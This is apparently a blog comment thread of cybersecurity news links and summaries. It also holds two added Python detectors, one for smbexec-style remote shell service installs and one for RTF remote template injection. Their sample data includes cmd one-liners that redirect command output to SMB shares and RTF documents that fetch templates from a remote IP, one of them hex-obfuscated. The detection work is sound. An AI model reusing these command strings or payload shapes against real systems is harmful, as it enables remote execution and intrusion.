4 Android Banking Trojan Campaigns Targeted Over 300,000 Devices in 2021
https://thehackernews.com/2021/11/4-android-banking-trojan-campaigns.html
Four different Android banking trojans were spread via the official Google Play Store between August and November 2021, resulting in more than 300,000 infections through various dropper apps that posed as seemingly harmless utility apps to take full control of the infected devices.
Tomi Engdahl says:
Telcos to get expanded scam-blocking powers through telecommunications law amendment https://www.zdnet.com/article/telcos-to-get-expanded-scam-blocking-powers-through-telecommunications-law-amendment/
Telstra is developing a new cyber safety capability designed to automatically detect and block scam SMS messages in light of new regulatory changes for the telecommunications sector.
Tomi Engdahl says:
Kaspersky – APT annual review 2021
https://securelist.com/apt-annual-review-2021/105127/
In the Global Research and Analysis Team at Kaspersky, we track the ongoing activities of more than 900 advanced threat actors and activity clusters. For this annual review, we have tried to focus on what we consider to be the most interesting trends and developments of the last 12 months. This is based on our visibility in the threat landscape and it’s important to note that no single vendor has complete visibility into the activities of all threat actors.
Tomi Engdahl says:
Detecting SILENT CHOLLIMA’s Custom Tooling
https://www.crowdstrike.com/blog/how-falcon-overwatch-detected-silent-chollima-custom-tooling/
OverWatch threat hunters detected a burst of suspicious reconnaissance activity in which the threat actor used the Smbexec tool under a Windows service account. Originally designed as a penetration testing tool, Smbexec enables covert execution by creating a Windows service that is then used to redirect a command shell operation to a remote location over Server Message Block (SMB) protocol. This approach is valuable to threat actors, as they can perform command execution under a semi-interactive shell and run commands remotely, ultimately making the activity less likely to trigger automated detections.
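The service-creation step described above is the detectable part of this tradecraft: the service's binary path is not a binary at all but a cmd one-liner that echoes a command into a batch file and redirects its output to an SMB share. The following is an added example, not code from the CrowdStrike post, that hunts for that shape in constructed System log 7045 ("a service was installed") and Security log 4697 records. The ImagePath string it matches is my reading of what impacket's smbexec produces (%COMSPEC% /Q /c echo <cmd> ^> \\127.0.0.1\<share>\__output 2^>^&1 > %TEMP%\execute.bat ...), so treat the exact pattern and the field names as assumptions to tune against your own telemetry.

```python
"""Hunt for smbexec-style service installs in Windows service-install events.

Added example, not from the original post. Works on constructed event records
rather than a live event log; the impacket-style ImagePath is an assumption.
"""
import re
from typing import Dict, List

# Each indicator captures one piece of the "echo a command into a batch file,
# run it, send stdout to an SMB share" pattern the service binPath carries.
# Example (assumed, impacket smbexec style):
#   %COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & ...
INDICATORS = {
    "cmd_interpreter": re.compile(r"(?i)(%COMSPEC%|\bcmd(?:\.exe)?\b)"),
    "echo_redirect":   re.compile(r"(?i)\becho\b.*\^?>"),
    "unc_output":      re.compile(r"\\\\[\w.\-]+\\[\w$]+"),      # \\127.0.0.1\C$ or \\host\ADMIN$
    "temp_batch":      re.compile(r"(?i)%TEMP%\\[^\s&]*\.bat"),
}


def is_smbexec_like(image_path: str) -> bool:
    """True when the service binary path is a cmd one-liner that echoes a command
    into a batch file and/or redirects its output over SMB, which is how smbexec
    gets a semi-interactive shell without dropping a binary on disk."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(image_path)}
    return bool({"cmd_interpreter", "echo_redirect"} <= hits
                and hits & {"unc_output", "temp_batch"})


def hunt(events: List[Dict[str, str]]) -> List[str]:
    """Return 'ServiceName (account)' for every service-install event whose ImagePath
    looks like smbexec. Service installs are rare on most hosts, so each hit is worth
    a look even before correlating with the SMB logon that created it."""
    findings = []
    for ev in events:
        if ev.get("EventID") not in ("7045", "4697"):
            continue
        if is_smbexec_like(ev.get("ImagePath", "")):
            findings.append(f"{ev['ServiceName']} ({ev.get('AccountName', '?')})")
    return findings


# Constructed sample records with the fields an event-log export would carry.
SAMPLE_EVENTS = [
    {"EventID": "7045", "ServiceName": "BTOBTO", "AccountName": "LocalSystem",
     "ImagePath": r"%COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat"},
    {"EventID": "7045", "ServiceName": "VendorUpdater", "AccountName": "LocalSystem",
     "ImagePath": r'"C:\Program Files\Vendor\updater.exe" --service'},
    {"EventID": "7045", "ServiceName": "PSEXESVC", "AccountName": "LocalSystem",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},   # psexec drops a binary; needs its own rule
    {"EventID": "4697", "ServiceName": "svc_tmp", "AccountName": r"CORP\svc-backup",
     "ImagePath": r"cmd.exe /Q /c echo whoami ^> \\10.0.0.5\ADMIN$\out.txt 2^>^&1"},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print("smbexec-like service install:", finding)
```

The rule deliberately keys on the structure of the command line rather than on the default service name, since the name is trivially changed; the account name is carried along because, as the post notes, seeing this run under a service account rather than an interactive user is itself a useful signal.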
Tomi Engdahl says:
Understanding the Adversary: How Ransomware Attacks Happen
https://securityintelligence.com/posts/how-ransomware-attacks-happen/
IBM Security X-Force Incident Response (IR) has responded to hundreds of ransomware incidents across every geography and industry. As we have taken time to analyze these incidents, a clear pattern has emerged. Although we observe dozens of ransomware groups in operation across the globe, many with multiple affiliate groups working under them, most ransomware actors tend to follow a similar attack flow and set of standard operating procedures.
Tomi Engdahl says:
Traficom is looking for ways to block international scam calls https://www.epressi.com/tiedotteet/telekommunikaatio/traficom-etsii-keinoja-kansainvalisten-huijaussoittojen-estamiseksi.html
The Finnish Transport and Communications Agency Traficom is preparing, in cooperation with the telecom operators in Finland, measures to block caller number spoofing, which has become common in scam calls. The goal is to hinder and prevent the activities of international criminals.
Tomi Engdahl says:
How Decryption of Network Traffic Can Improve Security
https://threatpost.com/decryption-improve-security/176613/
Strong encryption is critical to protecting sensitive business and personal data. Google estimates that 95 percent of its internet traffic uses the encrypted HTTPS protocol, and most industry analyst firms conclude that between 80-90 percent of network traffic is encrypted today. This is a significant step forward for data integrity and consumer privacy. However, organizations with a commitment to data privacy aren’t the only ones who see value in obscuring their digital footprint in encrypted traffic. Cybercriminals have been quick to weaponize encryption as a means to hide their malicious activity in otherwise benign traffic.
Tomi Engdahl says:
APT groups from China, Russia, and India adopt novel attack technique
https://therecord.media/apt-groups-from-china-russia-and-india-adopt-novel-attack-technique/
State-sponsored hacking groups, also known as advanced persistent threats (APTs), have adopted this year a new attack technique called “RTF Template Injection,” which has brought a new twist and made their attacks harder to detect and stop. In a report today, email security firm Proofpoint said that APTs from China, Russia, and India are already exploiting this technique, which they also expect to see adopted by financially-motivated threat actors as well.
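The technique rests on a single RTF destination: the {\*\template ...} group names the template Word should load with the document, and if that target is a URL instead of a local path, Word fetches it from the attacker's server when the file is opened. The following is an added example, not code from the Proofpoint report or The Record article, that pulls every template destination out of an RTF file and reports the remote ones; the sample documents are constructed. It also decodes \'hh hex-escaped bytes in the destination, which RTF permits and which goes a little beyond what the article spells out.

```python
"""Flag RTF documents whose \\*\\template destination points at a remote resource.

Added example, not from the original article. The sample RTF snippets below
are constructed; the remote-target test is a plain URL/UNC check.
"""
import re
from typing import List

# {\*\template <destination>} with no nested groups inside the destination.
TEMPLATE_GROUP = re.compile(r"\{\\\*\\template\s*([^{}]*)\}", re.IGNORECASE)
# A destination Word would resolve over the network: URL scheme or UNC path.
REMOTE = re.compile(r"(?i)^(?:https?|ftp|file)://|^\\\\")


def _unescape(dest: str) -> str:
    """Turn an RTF destination back into plain text: drop line breaks (RTF ignores
    them), decode \\'hh hex escapes, then unescape the literal \\\\, \\{ and \\}."""
    dest = dest.replace("\r", "").replace("\n", "")
    dest = re.sub(r"\\'([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), dest)
    dest = re.sub(r"\\([\\{}])", r"\1", dest)
    return dest.strip()


def extract_templates(rtf: str) -> List[str]:
    """All template destinations in the document, decoded to plain text."""
    return [_unescape(m.group(1)) for m in TEMPLATE_GROUP.finditer(rtf)]


def find_remote_templates(rtf: str) -> List[str]:
    """Destinations that would make Word fetch the template over the network."""
    return [d for d in extract_templates(rtf) if REMOTE.match(d)]


# Constructed samples: a normal local template, a plain remote one, and the same
# remote target with its scheme written as hex escapes to dodge naive greps.
BENIGN_RTF = r"{\rtf1\ansi{\*\template C:\\Users\\alice\\Templates\\Normal.dotm}\f0 Quarterly report}"
MALICIOUS_RTF = r"{\rtf1\ansi{\*\template http://203.0.113.10/template.dotm}\f0 Invoice}"
OBFUSCATED_RTF = r"{\rtf1\ansi{\*\template \'68\'74\'74\'70\'3a\'2f\'2f203.0.113.10/t.dotm}\f0 Invoice}"

if __name__ == "__main__":
    for name, doc in [("benign", BENIGN_RTF), ("malicious", MALICIOUS_RTF), ("obfuscated", OBFUSCATED_RTF)]:
        print(name, "->", find_remote_templates(doc) or "no remote template")
```

Run this over attachments before they reach a mailbox, or over a sample in the lab: a remote template destination in a document that arrived by email has essentially no benign explanation. The check is string based and does not handle a destination split by nested groups or \u escapes, so pair it with a proper RTF parser where you need full coverage.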
Tomi Engdahl says:
Finns' data is on American servers: “Significant intelligence information”
https://www.is.fi/digitoday/tietoturva/art-2000008441552.html
The Digital and Population Data Services Agency (DVV) assures that Finns' data is safe. An organisation advocating citizens' digital rights is not so sure. A legal dispute has broken out over the way DVV handles Finns' data. Electronic Frontier Finland (Effi ry), which advocates people's rights in the digital world, has appealed to the Helsinki Administrative Court against DVV's decision not to disclose how Finns' data is protected in Amazon Web Services (AWS).
The US company AWS is the cloud services subsidiary of Amazon, one of the world's largest technology companies. It is also responsible for the production hosting of the Suomi.fi portal.
Tomi Engdahl says:
Top 10 AWS Security Misconfigurations
https://www.trendmicro.com/en_us/devops/21/k/top-10-aws-security-misconfigurations.html
Misconfigurations pose the biggest threat to cloud security. We compiled the top 10 AWS services with the highest misconfiguration rates.
Tomi Engdahl says:
FBI document shows what data can be obtained from encrypted messaging apps
https://therecord.media/fbi-document-shows-what-data-can-be-obtained-from-encrypted-messaging-apps/
A recently discovered FBI training document shows that US law enforcement can gain limited access to the content of encrypted messages from secure messaging services like iMessage, Line, and WhatsApp, but not to messages sent via Signal, Telegram, Threema, Viber, WeChat, or Wickr.
Tomi Engdahl says:
Twitter Bans Users From Posting ‘Private Media’ Without a Person’s Consent
https://thehackernews.com/2021/11/twitter-bans-users-from-posting-private.html
Twitter on Tuesday announced an expansion to its private information policy to include private media, effectively prohibiting the sharing of photos and videos without express permission from the individuals depicted in them with an aim to curb doxxing and harassment.
Tomi Engdahl says:
Fact: 94% of successful malware attacks now begin with phishing. Here’s what three industry experts have to say about identifying and preventing attacks:
https://thehackernews.com/2021/07/3-steps-to-strengthen-your-ransomware.html via The Hacker News
Stay #CyberFit with Acronis
#CyberProtection #MSP #ManagedServices
Tomi Engdahl says:
https://www.nbcnews.com/tech/security/still-paying-antivirus-software-experts-say-probably-dont-need-rcna6335
Tomi Engdahl says:
Did a data breach hit you or your company? Here's what to do
https://www.tivi.fi/uutiset/tv/883ce01d-e56f-4b00-985b-b2792e8e13af
The Digital and Population Data Services Agency has published, in the Suomi.fi online service, an electronic guide for organisations that have been the target of a data breach or data leak. The guide gives companies, associations and other organisations information on how to act if they suspect their organisation has fallen victim to a data breach, or if confidential information held by the organisation has leaked into the public domain.
Tomi Engdahl says:
Jumping the air gap: 15 years of nation-state effort
https://www.welivesecurity.com/2021/12/01/jumping-air-gap-15-years-nation-state-effort/
Air-gapping is used to protect the most sensitive of networks. In the first half of 2020 alone, four previously unknown malicious frameworks designed to breach air-gapped networks emerged, bringing the total, by our count, to 17. ESET Research decided to revisit each framework known to date and to put them in perspective, side by side. Despite some differences and nuances found across all frameworks studied, our analysis shows how most differ on many of those aspects only from an implementation perspective, mostly due to the severe constraints imposed by air-gapped environments. Armed with this information, we will highlight some detection opportunities specific to the actual techniques observed in the wild.
Tomi Engdahl says:
Australia passes bill allowing it to impose sanctions for cyber-attacks https://therecord.media/australia-passes-bill-allowing-it-to-impose-sanctions-for-cyber-attacks/
The Australian version of the Magnitsky Act, which passed unanimously this week, can also be used to sanction corrupt politicians and human rights abuses but also includes a clause to punish foreign hackers as well.
Tomi Engdahl says:
Encryption Does Not Equal Invisibility Detecting Anomalous TLS Certificates with the Half-Space-Trees Algorithm
https://research.nccgroup.com/2021/12/02/encryption-does-not-equal-invisibility-detecting-anomalous-tls-certificates-with-the-half-space-trees-algorithm/
There is often (meta)data to consider when looking at encrypted traffic which still has operational value. In this blogpost, we describe the research on the characteristics of TLS certificates that we conducted and the incremental machine learning model that we applied to detect the anomalous certificates.
Tomi Engdahl says:
Chambers of commerce and HVK to cooperate on strengthening business continuity management https://www.huoltovarmuuskeskus.fi/a/kauppakamarit-ja-hvk-yhteistyohon-yritysten-jatkuvuudenhallinnan-vahvistamiseksi
The pandemic has made many companies see the importance of continuity management in a new light. The Finland Chamber of Commerce, the regional chambers of commerce and HVK (the National Emergency Supply Agency) stress the importance of preparedness and aim to jointly create tools for companies for this work by launching the Luotettava jatkuvuus (“Reliable Continuity”), or Lujat, development project.
Tomi Engdahl says:
Inside Intel’s Secret Warehouse in Costa Rica
https://www.wsj.com/articles/inside-intels-secret-warehouse-in-costa-rica-11638181801?mod=djemalertNEWS
Legacy technology can introduce cybersecurity weaknesses. Tech makers constantly improve their products to take advantage of speed and power increases, but customers don’t always upgrade at the same pace.
Intel’s answer to this conundrum was to create a warehouse and laboratory in Costa Rica, where the company already had a research-and-development lab, to store the breadth of its technology and make the devices available for remote testing.
Chip maker is stockpiling legacy technology for security research, plans to expand facility to house 6,000 pieces of equipment
Tomi Engdahl says:
Known Exploited Vulnerabilities Catalog
https://www.cisa.gov/known-exploited-vulnerabilities-catalog
Tomi Engdahl says:
Prediction Season: What’s in Store for Cybersecurity in 2022?
https://www.securityweek.com/prediction-season-whats-store-cybersecurity-2022
The past year has been quite challenging and tiring for many IT and security professionals, as threat actors capitalized on the rapidly changing environment created by accelerated digitalization and cloud transformation in response to the COVID-19 pandemic. And while we all hope that the next year is better when it comes to the onslaught of daily phishing, ransomware, and credential stuffing attacks; cyber criminals will likely learn from this year’s successful tactics, retool, and pivot them into next year’s campaigns to wreak even more havoc in all lives.
Today’s dynamic threatscape requires that we adjust to the ever-expanding attack surface. It doesn’t matter where data resides, or who is ultimately trying to access it — humans or machines. What matters most is that we minimize the risk of data exfiltration. Period.
Consider the following threats that are on the horizon in 2022 and start preparing for them now:
Compromised Identities Continue to Fuel the Cyberattack Engine
Ransomware Attacks Evolve to Multifaceted Extortion Schemes
Pay Attention to the Supply Chain Threats
The Work from Anywhere Era Creates New Threats
Conclusion
While it might be overwhelming to look at the four critical threats on the horizon you need to prepare for, focusing on these predictions for 2022 will help you strengthen your security posture and minimize your organization’s risk exposure. In the end, it all comes down to addressing the most imminent threats facing your organization.
Tomi Engdahl says:
The Impact of the Pandemic on Today’s Approach to Cybersecurity
https://www.securityweek.com/impact-pandemic-todays-approach-cybersecurity
Security practitioners must figure out how to enable a secure and resilient anywhere workforce to reduce risk
While digitalization and cloud transformation were already part of most organization’s long-term strategy, the COVID-19 pandemic not only accelerated but permanently transformed the cybersecurity landscape by ushering in a new work from anywhere era.
To support the sudden shift to remote working, many companies had to adopt a “move first, plan later” approach and leave their network-centric security bubble behind that allowed IT teams to own and control most of the network. Ultimately, punching holes in existing security controls in the name of business continuity created vulnerabilities and exposed many organizations to increased risks. Cyber adversaries capitalized on the rapidly changing environment by intensifying their attacks and targeting the weakest link in the attack chain – the remote worker. This led to a 141 percent year-over-year increase in volume of data breached.
As it’s become clear that remote/hybrid work is here to stay, IT security practitioners must figure out how to enable a secure and resilient anywhere workforce to minimize their future risk exposure.
Tomi Engdahl says:
A Peek Inside Anom, the Phone Company Secretly Used in an FBI Honeypot
Videos, documents, and other files obtained by Motherboard show how the company functioned as an entity in its own right.
https://www.vice.com/en/article/n7nnmg/inside-anom-video-operation-trojan-shield-ironside
“We were never told that this project is going to be in the middle of this,” one developer who worked for Anom told Motherboard, referring to the secret that the phones sent their messages to the authorities. Motherboard granted the source anonymity to protect them from retaliation. The developer said Anom management told them that their customers were corporations. “Those are our customers. That’s what we were told,” they said.
Several years ago Anom’s creator, a convicted drug trafficker, offered Anom to the FBI for its own use in investigations during the early stages of the company’s creation, according to court records. Authorities and the creator then introduced the feature to surreptitiously intercept users’ messages. Earlier this year Motherboard obtained one of the Anom devices from the secondary market. As well as hiding the Anom communications platform behind the phone’s calculator app, the device also had a dummy operating system loaded with banal looking apps that could be used to trick a casual observer that the device was just an ordinary phone.
Tomi Engdahl says:
Finding Your Niche in Cybersecurity
With a little patience and research, you can discover a role you love that also protects those around you.
https://www.darkreading.com/careers-and-people/finding-your-niche-in-cybersecurity
Tomi Engdahl says:
‘Confusion’ emerges as new weapon class for Air Force cyber warriors
https://www.c4isrnet.com/electronic-warfare/2021/12/01/confusion-emerges-as-new-weapon-class-for-air-force-cyber-warriors/